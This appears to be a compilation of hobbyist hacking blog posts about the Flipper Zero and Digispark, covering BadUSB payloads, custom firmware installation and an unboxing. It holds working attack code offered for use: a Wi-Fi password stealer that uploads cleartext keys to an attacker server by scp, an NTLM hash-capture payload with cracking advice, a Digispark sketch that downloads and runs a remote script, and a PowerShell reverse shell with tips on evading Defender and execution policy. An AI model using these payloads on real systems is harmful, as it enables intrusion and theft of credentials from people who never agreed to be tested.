Stealing Passwords With The Flipper Zero

Hello world and welcome to HaXeZ, in this post I’m going to be stealing passwords with the Flipper Zero. A BadUSB attack abuses the trust a computer places in anything that enumerates as a USB keyboard: the operating system cannot tell injected keystrokes from typed ones, so the device can type commands as whoever is logged in. We will use this to perform keystroke injection and carry out our evil intentions. Ok, it’s a purely educational post to show the dangers of such an attack, but also because the Flipper Zero has a really cool UI for doing it. The following payloads can all be found at https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky. I take no credit for any of them.

Flipper Zero Bad USB Menu

Our First Flipper Zero BadUSB Payload

The first payload opens a terminal and executes a command. It is written in Ducky Script, the native language of the Hak5 USB Rubber Ducky, which the Flipper’s BadUSB application also understands. The script starts with DELAY 100, a pause of 100 milliseconds (DELAY values are milliseconds, not seconds) so the host has finished recognising the device before any keystrokes are sent. Then it has a REM comment of “opens run”. Next, GUI r injects the Windows key (GUI) together with r, which opens the Run dialog box. After another 100 millisecond delay, STRING types text into the Run box telling the system to open a PowerShell window with its window style set to hidden.

The script then waits 1000 milliseconds for the PowerShell window to open. After that, it types a line telling PowerShell to load the PresentationFramework assembly (Add-Type -AssemblyName PresentationFramework), which is what provides the System.Windows.MessageBox class used next. The script presses ENTER, waits again, and types a line that creates a pop-up box informing the user that they have been hacked. A final ten second delay gives them time to read it before exit closes the PowerShell session. Note that -windowstyle hidden only hides the console; the message box is a separate window and still appears.

DELAY 100
REM opens run
GUI r
DELAY 100
STRING powershell -windowstyle hidden
ENTER
DELAY 1000
STRING Add-Type -AssemblyName PresentationFramework
ENTER
DELAY 1000
STRING [System.Windows.MessageBox]::Show('!!! YOU HAVE BEEN HAXED !!!')
ENTER
DELAY 10000
STRING exit
ENTER

Now, save it as a text file and drop it into the BadUSB directory on the Flipper’s SD card. To test it, close the Flipper desktop application first, since it keeps hold of the USB connection. Then connect the Flipper Zero again, navigate to the Bad USB payloads, select the payload and run it.

BadUSB Directory

Flipper BadUSB Browser Pranks

Granted, the previous payload doesn’t really do anything harmful. However, it does demonstrate that the Flipper can launch a PowerShell window and execute commands, and anything that can be typed into that window is now on the table. With that in mind, we can leverage that ability to perform other types of pranks or attacks.

For example, wouldn’t it be fun if you could “instantly” Rick Roll someone by connecting to their computer? The script below sort of does that. As with the previous script, it first waits 100 milliseconds and then opens the Run dialog box. Then it types a YouTube URL, which the Run box hands to the system’s default browser. After another delay it types f, YouTube’s keyboard shortcut for full screen, and then presses F11 to put the browser itself into full screen and hide the URL and menu bars. Note that a character to be typed has to go through STRING (STRING f); a bare f on a line of its own is not a Ducky Script command. Granted, it isn’t perfect. Some browsers don’t auto-play videos, and if the page hasn’t loaded inside the one second delay the f goes nowhere, so you can tinker with the delays to make it better.

REM Rick Rolling
DELAY 100
REM opens run
GUI r
DELAY 100
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstley
ENTER
DELAY 1000
REM f is the YouTube full screen shortcut, F11 the browser one
STRING f
DELAY 500
F11
BadUSB Rick Roll
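A typo in a payload only shows up when you plug the Flipper in, and on an engagement you may only get one plug-in. The block below is an added example written for this page, not Hak5’s or the Flipper project’s code: a small checker for Ducky Script that knows the commands used in the payloads above plus the usual key names (an assumption, since the Flipper’s BadUSB dialect accepts more; STRINGLN and DEFAULT_DELAY are included, and anything missing here is reported as unknown rather than passed through), verifies that DELAY values are numbers, and adds up the delays so you know roughly how long the payload needs. Two constructed payloads are embedded: the PowerShell pop-up from earlier, and a Rick Roll script with a bare f where STRING f was meant, which is exactly the mistake it is there to catch.

```python
from typing import List, Tuple

# Named keys that may stand alone or follow a modifier. An assumption: this is
# the common Ducky Script set, not the Flipper's full list; anything missing
# is reported as unknown rather than passed through.
KEYS = {
    "ENTER", "TAB", "SPACE", "ESC", "ESCAPE", "BACKSPACE", "DELETE", "INSERT",
    "HOME", "END", "PAGEUP", "PAGEDOWN", "UP", "UPARROW", "DOWN", "DOWNARROW",
    "LEFT", "LEFTARROW", "RIGHT", "RIGHTARROW", "CAPSLOCK", "NUMLOCK",
    "SCROLLLOCK", "PRINTSCREEN", "PAUSE", "BREAK", "MENU", "APP",
} | {f"F{n}" for n in range(1, 13)}
MODIFIERS = {"CTRL", "CONTROL", "ALT", "SHIFT", "GUI", "WINDOWS", "COMMAND"}


def lint_ducky(script: str) -> Tuple[List[str], int]:
    """Check a Ducky Script payload. Returns (errors, estimated_ms): the estimate
    is the sum of DELAY values plus DEFAULT_DELAY after each command, and ignores
    the time the Flipper spends typing STRING text."""
    errors: List[str] = []
    total_ms = 0
    default_delay = 0
    for num, raw in enumerate(script.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        parts = line.split(None, 1)
        head, arg = parts[0], (parts[1] if len(parts) > 1 else "")
        cmd = head.upper()
        if cmd == "REM":
            continue
        if cmd in ("DELAY", "DEFAULT_DELAY", "DEFAULTDELAY"):
            if not arg.isdigit():
                errors.append(f"line {num}: {head} needs a number of milliseconds, got {arg!r}")
            elif cmd == "DELAY":
                total_ms += int(arg)
            else:
                default_delay = int(arg)
            continue
        if cmd in ("STRING", "STRINGLN"):
            if not arg:
                errors.append(f"line {num}: {head} has no text to type")
        elif cmd == "REPEAT":
            if not arg.isdigit():
                errors.append(f"line {num}: REPEAT needs a count, got {arg!r}")
        elif set(cmd.split("-")) <= MODIFIERS:
            # Modifier or combo, e.g. GUI r or CTRL-ALT DELETE. A bare GUI
            # (Start menu) is fine; otherwise one character or a named key.
            if arg and not (arg.upper() in KEYS or len(arg) == 1):
                errors.append(f"line {num}: {head} must be followed by a single key, got {arg!r}")
        elif cmd in KEYS:
            if arg:
                errors.append(f"line {num}: {head} takes no argument, got {arg!r}")
        else:
            errors.append(f"line {num}: unknown command {head!r}; to type it use 'STRING {line}'")
        total_ms += default_delay
    return errors, total_ms


# Constructed test payloads: the PowerShell pop-up from earlier on this page,
# and a Rick Roll payload with the bare "f" mistake.
POPUP = """DELAY 100
REM opens run
GUI r
DELAY 100
STRING powershell -windowstyle hidden
ENTER
DELAY 1000
STRING Add-Type -AssemblyName PresentationFramework
ENTER
DELAY 1000
STRING [System.Windows.MessageBox]::Show('!!! YOU HAVE BEEN HAXED !!!')
ENTER
DELAY 10000
STRING exit
ENTER
"""

RICKROLL_BUGGY = """REM Rick Rolling
DELAY 100
REM opens run
GUI r
DELAY 100
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTER
DELAY 1000
f
"""

if __name__ == "__main__":
    for name, payload in (("popup", POPUP), ("rickroll", RICKROLL_BUGGY)):
        errs, ms = lint_ducky(payload)
        print(f"{name}: about {ms} ms of delays, {len(errs)} problem(s)")
        for err in errs:
            print("  " + err)
```

Run it over a payload before copying the file to the SD card; the duration estimate is also a useful sanity check, since a payload that needs twelve seconds of delays is twelve seconds the Flipper has to stay plugged in.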

Stealing Wi-Fi Passwords

Collecting saved Wi-Fi passwords is pretty simple with the Flipper Zero. However, exfiltrating them from the victim’s system is where you may run into problems. You should definitely not use the method below. It’s quick and dirty: it uses SCP to upload the files to your server, which requires authenticating, so the payload types your server’s password in clear text on the target, where anyone who picks up the Flipper or reads the script can find it. I’m using it only as a quick way to demonstrate stealing the passwords. You should absolutely use something more sensible, such as sending the data by email or as an HTTPS POST to a web server you control.

With the obvious out of the way, this script launches a Windows Command Prompt and changes directory to %temp%. Next, it runs netsh wlan export profile key=clear, which writes one XML file per wireless profile the target remembers into the current directory, with the passphrase in clear text in the keyMaterial element (without key=clear the key is exported DPAPI-protected and is useless off the box). Next is the part you should absolutely change: it uses SCP to transfer the XML files to the server, and because the server asks for a password it adds a delay and then types the password kali as a string.

Note that if the victim’s machine hasn’t connected to your Kali server before, scp will first ask whether to trust the unknown host key, and that prompt wants the word yes rather than a bare Enter. Either add STRING yes followed by ENTER after the scp command and before the password is typed, or pass -o StrictHostKeyChecking=no to scp so the prompt never appears.

REM Wifi password stealer
DELAY 100
GUI r
DELAY 100
STRING cmd
ENTER
DELAY 1000
STRING cd %temp%
ENTER
DELAY 1000
REM exports the wifi passwords as XML
STRING netsh wlan export profile key=clear
ENTER
DELAY 1000
REM copies the files to the kali host
STRING scp -r %temp%/*.xml kali@192.168.0.56:/home/kali/loot
ENTER
DELAY 1000
STRING kali
ENTER

The image below shows that the files have been successfully transferred to the Kali server using the SCP tool.

Stealing Wi-Fi Passwords

The screenshot below shows the output from running cat against one of the files. The highlighted section is the keyMaterial element for the access point called “Super Secure Access Point”. The passphrase is Password1337!@, which a threat actor could now use to connect to that access point. Once on the network, they could get up to all sorts of nefarious things.

Wi-Fi Password Stolen
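To show what the exported files actually contain, and what to look for in a pile of them, here is an added Python example (mine, not the page author’s or Microsoft’s) that parses the WLANProfile XML that netsh writes. The three sample profiles are constructed in the shape of a real export: a WPA2-PSK profile using the SSID and passphrase from the screenshot, an open network with no key at all, and a profile exported without key=clear, where keyMaterial is a DPAPI-protected blob (the hex in the sample is a truncated placeholder, not a real blob) that only decrypts on the machine that exported it. Only the first yields a passphrase that is any use elsewhere.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Tuple

# Namespace of every WLANProfile document "netsh wlan export profile" writes.
NS = {"w": "http://www.microsoft.com/networking/WLAN/profile/v1"}


def _profile(name: str, auth: str, enc: str, shared_key: str = "") -> str:
    """Build a constructed profile document in the shape netsh writes.
    Sample data only; real files come out of the target's %temp%."""
    return f"""<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>{name}</name>
  <SSIDConfig><SSID><hex>{name.encode().hex().upper()}</hex><name>{name}</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM><security>
    <authEncryption><authentication>{auth}</authentication><encryption>{enc}</encryption><useOneX>false</useOneX></authEncryption>
    {shared_key}
  </security></MSM>
</WLANProfile>"""


def _shared_key(key: str, protected: bool) -> str:
    flag = "true" if protected else "false"
    return (f"<sharedKey><keyType>passPhrase</keyType><protected>{flag}</protected>"
            f"<keyMaterial>{key}</keyMaterial></sharedKey>")


# Constructed samples: the SSID and passphrase from the screenshot, an open
# network, and a profile exported without key=clear (keyMaterial is then a
# DPAPI blob; the hex here is a truncated placeholder, not a real blob).
SAMPLE_CLEAR = _profile("Super Secure Access Point", "WPA2PSK", "AES",
                        _shared_key("Password1337!@", protected=False))
SAMPLE_OPEN = _profile("Coffee Shop Guest", "open", "none")
SAMPLE_PROTECTED = _profile("Office", "WPA2PSK", "AES",
                            _shared_key("01000000D08C9DDF0115D1118C7A00C04FC297EB00000000", protected=True))


def parse_wlan_profile(xml_text: str) -> Dict[str, Optional[str]]:
    """Pull the fields that matter out of one exported profile."""
    root = ET.fromstring(xml_text)

    def text(path: str) -> Optional[str]:
        el = root.find(path, NS)
        return el.text if el is not None else None

    sec = "w:MSM/w:security/"
    return {
        "ssid": text("w:SSIDConfig/w:SSID/w:name"),
        "authentication": text(sec + "w:authEncryption/w:authentication"),
        "encryption": text(sec + "w:authEncryption/w:encryption"),
        "key_protected": text(sec + "w:sharedKey/w:protected"),  # "true", "false" or None
        "key": text(sec + "w:sharedKey/w:keyMaterial"),
    }


def cleartext_keys(docs: List[str]) -> List[Tuple[str, str, str]]:
    """Return (ssid, authentication, passphrase) for every profile whose key is
    usable off the box: present and not DPAPI-protected."""
    found = []
    for doc in docs:
        p = parse_wlan_profile(doc)
        if p["key"] and p["key_protected"] == "false":
            found.append((p["ssid"], p["authentication"], p["key"]))
    return found


if __name__ == "__main__":
    for ssid, auth, key in cleartext_keys([SAMPLE_CLEAR, SAMPLE_OPEN, SAMPLE_PROTECTED]):
        print(f"{ssid} ({auth}): {key}")
```

The same parser works from the defensive side: run it over profiles exported on a build machine or a shared laptop and anything that shows up in cleartext_keys is a passphrase that walks out with the XML.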

Stealing Windows Password Hashes

The next payload is taken directly from Hak5 and is a good attack against machines joined to a domain. It has the potential to capture a Windows password hash in a matter of seconds. It requires the Impacket smbserver.py Python script running on your machine to receive the connection; replace hostname in the payload with the name or IP address of that machine.

REM Super Quick Hash Grab Payload for USB Rubber Ducky
REM Target: Windows 9X and beyond! Author: Hak5Darren
DELAY 1000
GUI r
DELAY 100
STRING \\hostname
ENTER

The screenshot below illustrates stealing Windows password hashes using the USB Rubber Ducky payload above. Typing \\hostname into the Run box makes Windows open an SMB connection to that host and authenticate automatically as the logged-in user. As you can see, the user joseph on the host authenticated against the SMB server, which logged the NTLM challenge/response (on modern Windows a NetNTLMv2 exchange, not the NT hash itself). Because the rogue server chose the challenge, the response can be taken offline and cracked by guessing passwords until one reproduces it; hashcat mode 5600 does exactly that.

Stealing Windows Password Hashes

For the full Hak5 write up please see the URL https://shop.hak5.org/blogs/usb-rubber-ducky/whats-the-quickest-way-to-steal-a-windows-password-hash. Hak5 also has an awesome write-up of using Mimikatz with the USB Rubber Ducky to steal Windows password hashes. I highly recommend giving it a read here https://shop.hak5.org/blogs/usb-rubber-ducky/15-second-password-hack-mr-robot-style.

Conclusions

I’m having a lot of fun with the Flipper Zero. The reason why I like the BadUSB feature so much is because of the user interface it provides. The fact that you have an easy-to-navigate user interface for selecting payloads makes it much more user-friendly. It allows you to store multiple payloads and select them easily which could be really useful for physical intrusion assessments. You could be in an environment that has Windows, Linux, and Apple machines. You could load your Flipper with various different payloads for various different operating systems and go nuts.

Making Flipper Zero Ultra with RogueMaster Firmware

Hello world and welcome to Haxez, in this post I’m going to be installing the RogueMaster Flipper Zero firmware. The RogueMaster firmware adds more functionality to the device by installing community applications. Installing the RogueMaster firmware is a fairly straightforward process. However, it is probably best to ensure you have updated and backed up your device first.

Updating The Flipper Zero

First, let’s update the device to the latest version. This can be done relatively quickly by installing the desktop application. You can download the application here and installing it is just a case of following the wizard. Once the application is installed, connect your device to it and look for the big green update button. Click the button and wait for the installation process to complete.

Updating the Flipper Zero

Back-Up The Flipper Zero

You should back up your device by heading to the spanner tab and clicking the backup button. When clicked, this button will spawn a Windows explorer window asking you where you want to save your backup. Then, choose a safe location on your computer and click save. Now that you have updated and backed up your device, it’s time to find the firmware.

Back-Up The Flipper Zero

Finding RogueMaster Firmware

The RogueMaster firmware can be found by performing a Google search for RogueMaster Firmware. In fact, the correct Github page should be first the result. Click the link and visit the page and then look for the correct repository.

RogueMaster GitHub Page

Once there, look for the Releases section. It should be on the right-hand side of the page. While there should be three options, the one I’m going to be downloading is the .tgz file. However, this could be a .zip file depending on the current release. A .tgz file is a gzip-compressed tar archive, similar in purpose to .zip, but on Windows you may need to install an additional tool like 7-Zip to extract it. Right-click the downloaded file, select 7-Zip from the context menu, then select Extract. Because it is a tar inside a gzip, you may need to extract twice: once to get the .tar, then again to get the directory inside it.

RogueMaster Firmware Download

Uploading The Files

Once the tar.gz and tar files have been extracted, head to the Flipper desktop application and navigate to the SD card. Locate the update directory and open it. Then, drag the extracted directory into that update directory. You may get an error message complaining that the files are too large. However, it is safe to ignore that message.

Uploading The Files

Installing The RogueMaster Firmware

Now that the files have been uploaded, head back to the main screen of the application and click on the Flipper Zero screen to expand it. Then, press the down button followed by the left button. That should allow you to browse the directories on the Flipper Zero including the update directory. From there, you should be able to navigate to the uploaded directory and locate the update package. Click on the package and select Run in app.

Installing The RogueMaster Firmware

Flipper Zero Update Complete

If you successfully installed the firmware then you should get a lovely picture of Goku suggesting that the installation was successful. Furthermore, you should get a link to join the GitHub community. If you run into issues then just reinstall the default software and go back through the installation process.

Update Complete

Flipper Zero RogueMaster New Features

The RogueMaster firmware includes many new features including the Sub-GHz frequencies required to hack open the Tesla charge ports. There is also a vast selection of games including Doom, Flappy Bird, Tetris, and Tic Tac Toe. To list all of the features and their purposes would require devoting an entire blog post. Feel free to check out my video where I go into a bit more detail.

New Features

Unleashing the power of the Flipper Zero

Hello world and welcome to Haxez, today we’re unleashing the power of the Flipper Zero by installing custom firmware. However, the first thing we need to do is ensure that the flipper is up to date. Therefore, head to the following URL and download the updater. Disclaimer, I’m not affiliated with the makers of the Flipper Zero in any way, nor is this sponsored. I’m merely making content for it because I like the device.

Updating Flipper Firmware

Updating Flipper Zero

Once the Flipper Zero desktop software is downloaded, launch it from the icon. Then, connect your Flipper Zero to your computer via the supplied USB C cable. The application should automatically detect the version of firmware that you have installed. If you’re up to date then you can skip this step. However, if you’re out of date then proceed and click the install button.

Updating The Flipper Zero

Backing Up Flipper Zero

Next, it is probably a good idea to back up your device. This can be accomplished fairly easily by clicking on the spanner menu button. There, you will have a number of options including backup, restore, erase and check for updates. All you need to do is click the backup button and save the file that it creates to a safe location.

Backing Up Flipper Zero

According to the Flipper blog, the firmware update process is fairly bulletproof. However, whenever you’re updating firmware whether it’s your BIOS or you’re rooting a phone, you need to be careful. If the device was to lose power while the new firmware is being written, it could brick your device. The Flipper device seems to have a method for updating the firmware whereby the old firmware remains on the device until the firmware is installed.

Flipper Zero Update Process

Finding Custom Firmware

Now that you have updated your Flipper and have taken a backup, it’s time to find some custom Firmware. The firmware that I’m going to be installing is called the unleashed firmware by Eng1n33r. This firmware is easy to install and has a number of different additional features. Notably, the firmware includes some community applications that provide functionality like fuzzing. Furthermore, there are some games including Doom.

Flipper Zero Unleashed Firmware

Downloading Custom Firmware

In order to download the custom firmware, head to the releases page on Github. There, you will see a link to a .tgz file. Click the link and save the file to a safe location on your computer. Please be advised that there is a web installer that can simplify the installation process. However, when I attempted to use the web updater it didn’t work. You need to use a Chromium-based browser but I think I had problems due to the firmware version I had installed.

Downloading Custom Firmware

Installing Flipper Zero Custom Firmware

In order to install the custom firmware, all you need to do is head back to the Flipper Desktop application. Back on the settings page, you will find an option to install from the file. Click that option and navigate to the .tgz file that you just downloaded. The desktop application will then switch to a progress bar showing you the installation progress.

Installing Custom Firmware

Once the Flipper desktop application reaches 100% it should prompt you to say to follow along on the Flipper Zero device itself. After a few minutes, you should get a notification that the Unleashed firmware has been installed successfully. It should look similar to the image below.

Unleashed Firmware Successfully Installed

Unleashed Firmware Features

I’m not going to go into all the features of the firmware in this post. Perhaps, this is something I will write another post and create another video on at a later date. It is packed with new apps including games though. If you fancy playing a bit of Doom, Tetris, or Flappy Bird in between your hacking activities then you now have the option to do that. You can see the full list of features on this page.

Unleashed Firmware Features

Conclusions

This post wasn’t meant to be a full breakdown of all the different features of the Unleashed Firmware. That is something I may go into more at a later date. The purpose of this post was to explain how to locate and safely install custom firmware. The developer has great installation instructions on their GitHub page so this article may be redundant but I wanted to create one. I’m enjoying using the unleashed firmware. It adds some great functionality. However, I will probably be looking at moving to the Roguemaster firmware in the near future.

Hack all the things with the Flipper Zero. Unboxing, Updating, and Playing

Hello world and welcome to Haxez. Recently, I was lucky enough to have my Flipper Zero delivered. If you don’t know what the Flipper Zero is then you should absolutely check it out. In their own words, it is a Swiss army knife for hackers. It has many different features including a cute dolphin Tamagotchi.

Unboxing the Flipper Zero

The Flipper Zero comes in a neat cardboard box with some cool graphics. The box was sealed with tape which was easily dispatched with a knife. Opening the box, you are presented with the instruction manual document. Underneath the manual is a foam housing protecting a USB C cable. Then, underneath the foam USB C holder is the glorious Flipper Zero. Not much more to say about it than that.

Unboxing the Flipper Zero

Updating The Flipper Zero

Updating the device was relatively simple. In fact, all I had to do was visit the software URL and download the installer. Once the software was installed, I connected the device to my laptop and it instantly recognized it. As can be seen from the image below, the interface is great and it has an obvious Update button. In summary, the update process took about 10 minutes, with most of that time taken up by writing the firmware to the device.

Updating The Flipper Zero

NFC Hacking

The device has the ability to clone and simulate NFC or near-field communication signals. Instantly, I decided to check this out by cloning the fob I used to enter my flat. Overall, the process was straightforward and worked like a charm. In short, you select NFC from the menu and then select read. Then, save the NFC signal to the device and use the simulate option to send the signal. Suddenly, the door unlocked and I was into my building.

NFC Hacking

BadUSB

The device also has a built-in BadUSB. To explain, a BadUSB is a device that presents itself to the host as a keyboard and injects keystrokes. Darren Kitchen from Hak5 brought this weakness of trusted input devices to the attention of the hacker community when Hak5 released the USB Rubber Ducky. Since then, it has been a viable attack vector to quickly execute commands on a host that you have physical access to. It was really intuitive to use: just plug in the device, select the payload from the menu and it executes it.

BadUSB

Infrared

I used to have an infrared light on my mobile phone and I thought it was the coolest thing ever. Being able to change channels on anyone’s TV gave me a silly sense of power. Since then, I have upgraded and lost that functionality. However, that power has now been restored with the Flipper Zero. After applying the update you get access to a universal remote control which you can use to control the universe… wait I mean TV’s and other infrared devices.

Infrared

Conclusions

I love this device and can’t wait to test out more of its functionality. I definitely need to get the Wi-Fi development breakout board to do some Wi-Fi shenanigans, but so far I’ve had a lot of fun with it. Unfortunately, I couldn’t get it to work with my car’s central locking. While the device reads the signal fine, sending it to the car does nothing. I suspect this has something to do with the rolling code security mechanism built into car keys, but I digress. Anyway, this was a quick review of the Flipper Zero, so far so awesome. I can’t wait to experiment with the massive amount of features. I have barely scratched the surface.

Hack Any Computer In 2 Seconds With This £2 Device | Digispark

Hello World and welcome to HaXeZ. In this post, I will be discussing the Digispark. With the right payload, the Digispark can hack any computer in 2 seconds. I realize that’s a bold claim to make and is definitely a clickbait title but it isn’t far from the truth. The Digispark, like the Hak5 USB Rubber Ducky, is a keyboard emulator that can inject keystrokes on the target computer at breakneck speeds. Therefore, anything a hacker can do on a keyboard, the Digispark can do too but arguably faster. So, If you’re having trouble getting hold of a Hak5 USB Rubber Ducky then this could be the device for you. For about £2 and a bit of time, you can build your own Rubber Ducky from a Digispark. I’ve written another article using a different board, feel free to check that one out here.

Arduino Integrated Development Environment

The first step in creating your very own DIY USB Rubber Ducky super hacking tool is to download the Arduino Integrated Development Environment. This can be downloaded from the following URL https://www.arduino.cc/en/software. Simply visit the URL, click the download link, double-click the downloaded file and then follow the installation wizard.

Arduino Integrated Development Environment

Configuring Arduino IDE

Once you have installed the Arduino IDE, you need to configure it so that it can write your payloads to the Digispark. In order to do this, first launch the Arduino IDE then head to File, then Preferences, then paste the following URL into the Additional Boards Manager URLs input box. This allows the Arduino IDE to work with third-party boards such as the Digispark.

http://digistump.com/package_digistump_index.json

Digispark Additional Boards Manager URLS

Install Digispark AVR Boards

Next, you need to install the Digistump Digispark boards so that the Arduino IDE knows how to talk to your board. To do this, head to Tools, Board and click Boards Manager. Then from the drop-down menu select contributed and search for the Digistump AVR Boards. There should be an install button, click that and wait for the boards to finish installing.

Arduino Boards Manager

Digispark Drivers

That should be everything you need. However, if Windows is having trouble recognizing your board then you may need to install the drivers manually. You can find these by performing a quick Google search for “Digispark Arduino Drivers”. This should take you to the following GitHub page which has a download link labeled Digistump.Drivers.zip. Download, extract and install these drivers.

https://github.com/digistump/DigistumpArduino/releases 
Digispark Drivers

Digispark Payloads

Now that your Arduino IDE is set up and the drivers are installed, it’s time to find some payloads. There are tons of payloads available on the internet that do various things. These payloads range from performing a fake Windows update while playing Never Gonna Give You Up by Rick Astley to launching a fork bomb on the target system. I hope it goes without saying that some of these payloads can be dangerous and you should exercise caution when playing with them. The following GitHub repository has some good payloads to practice with.

https://github.com/CedArctic/DigiSpark-Scripts
Digispark Payloads

Reverse Shell Downloader Payload

The payload I’m going to be focusing on is the PowerShell reverse shell payload. You can see from the sketch below that this is a fairly simple script. It starts by sending the Windows key and R to the computer, which opens the Run dialog box. After a brief delay, it types “powershell.exe” into the Run dialog and sends the Enter key, spawning a new PowerShell window. In that window, it types an Invoke-WebRequest command to download a second payload from a URL to payload.ps1. After a brief delay, it executes that file. One caveat: ./payload.ps1 runs a script file, so on a Windows client with the default Restricted execution policy it will be refused; starting PowerShell with -ExecutionPolicy Bypass, or piping the downloaded text into Invoke-Expression instead of saving it, gets around that.

// This script downloads and executes a PowerShell script, effectively opening up a reverse shell in less than 3 seconds.
// Credits to Hak5 and samratashok (developer of the Nishang framework).

#include "DigiKeyboard.h"

void setup() {
  // Nothing to set up: everything happens once in loop().
}

void loop() {
  // Send an empty report first so the host registers the keyboard before real keys arrive.
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(500);
  // Windows key + R opens the Run dialog.
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("powershell.exe");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  // Download the second stage; change the URL to a server you control.
  DigiKeyboard.print("Invoke-WebRequest -Uri 'https://haxez.org/payload.ps1' -OutFile 'payload.ps1'");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  // Run it. A default (Restricted) execution policy will refuse a script file.
  DigiKeyboard.print("./payload.ps1");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  for (;;) {
    /* Stop the Digispark from running the script again. */
  }
}

Powershell Reverse Shell Payload

Please note that the following Powershell script will probably be caught by Windows Defender. However, with some tinkering like renaming variables and obfuscating the code, it may not be detected. I won’t be attempting to do that in this walkthrough. The following script is a reverse shell that will attempt to connect back to the IP address and port that you specify. This script will need to be uploaded to a server that you control and then the location of the script needs to be added to the downloader payload above.

#A simple and small reverse shell by samratashok's Nishang framework. Change the Host IP Address and Port according to your setup as described in the README file of the script. 
$sm=(New-Object Net.Sockets.TCPClient("192.168.0.23",4243)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Writing Payloads To Digispark

Once you have your payloads ready, it’s time to write the downloader payload to the Digispark. It’s important that you don’t plug in the Digispark first. First, paste your code into the Arduino IDE and then click the upload button. This will then spawn a terminal at the bottom of the application prompting you to plugin the device. You should now be able to plug in your Digispark. Once the terminal reads 100%, the payload will automatically execute. Probably best if you don’t try to use any payload that can potentially damage your computer.

Upload Payload To Digispark

Digispark Demonstration

With the payload written to the Digispark, it’s time to test it out. Ensure that you have uploaded the reverse shell payload to your web server and that its URL has been amended in your downloader payload. Then set up a netcat listener (for example nc -lvnp 4243, matching the port in the script) or some other listener on your attack machine, the machine you want to connect back to, and plug the Digispark into the target machine. As mentioned previously, this will likely only work with Defender disabled unless you have modified your payload. However, please see the video below for a demonstration.

PwnHub Digispark Demonstration

Conclusions

The Digispark is a fantastic, affordable device that has a lot of flexibility. The price alone is enough to justify owning one and tinkering with it. Granted, the introduction about it being able to hack a computer in 2 seconds is a bit of an exaggeration, but I hope you can see the potential from the write-up. You can use it for automation rather than hacking. You can tell it to do anything a keyboard can do, provided the payload fits in the roughly 6 KB of flash left on the chip after the bootloader. I had a lot of fun with it and will be keeping a few preconfigured ones in my hack bag at all times… just in case. Anyway, check out the video below for a more hands-on demonstration.